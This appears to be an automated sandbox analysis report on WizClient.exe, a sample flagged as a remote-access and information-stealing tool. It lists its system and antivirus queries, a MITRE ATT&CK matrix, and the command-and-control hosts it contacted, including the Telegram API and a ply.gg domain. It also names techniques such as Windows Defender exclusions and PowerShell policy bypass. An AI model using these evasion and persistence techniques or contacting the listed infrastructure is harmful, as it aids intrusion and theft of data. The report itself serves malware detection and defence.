            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\WizClient.exeQueries volume information: C:\Users\user\AppData\Local\WizClient.exe VolumeInformation
            Source: C:\Users\user\Desktop\WizClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2593727968.000000001BD5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\WizClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: WizClient.exe, type: SAMPLE
            Source: Yara matchFile source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WizClient.exe PID: 7012, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara matchFile source: WizClient.exe, type: SAMPLE
            Source: Yara matchFile source: 3.0.WizClient.exe.230000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: WizClient.exe PID: 7012, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\WizClient.exe, type: DROPPED
            MITRE ATT&CK Matrix (one tactic per line, techniques in the report's row order; leading numbers are reproduced from the report's matrix cells)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: 1 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: 1 DLL Side-Loading; 12 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 12 Process Injection
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Query Registry; 121 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            [Behavior Graph, ID: 1636114, Sample: WizClient.exe, Startdate: 12/03/2025, Architecture: WINDOWS, Score: 100]
            The graph shows WizClient.exe (started three times, plus 2 other processes) contacting api.telegram.org (149.154.167.220, 443, 49714; TELEGRAMRU, United Kingdom), amazon-astrology.gl.at.ply.gg (147.185.221.26, 49717, 49722, 49728; SALSGIVERUS, United States), i.ibb.co and 2 other IPs or domains; dropping C:\Users\user\AppData\Local\WizClient.exe (PE32) and C:\Users\user\AppData\...\WizClient.exe.log (CSV); and starting three powershell.exe processes and schtasks.exe, each with a conhost.exe child.
            Signatures attached to graph nodes: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures; Uses the Telegram API (likely for C&C communication); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Loading BitLocker PowerShell Module.
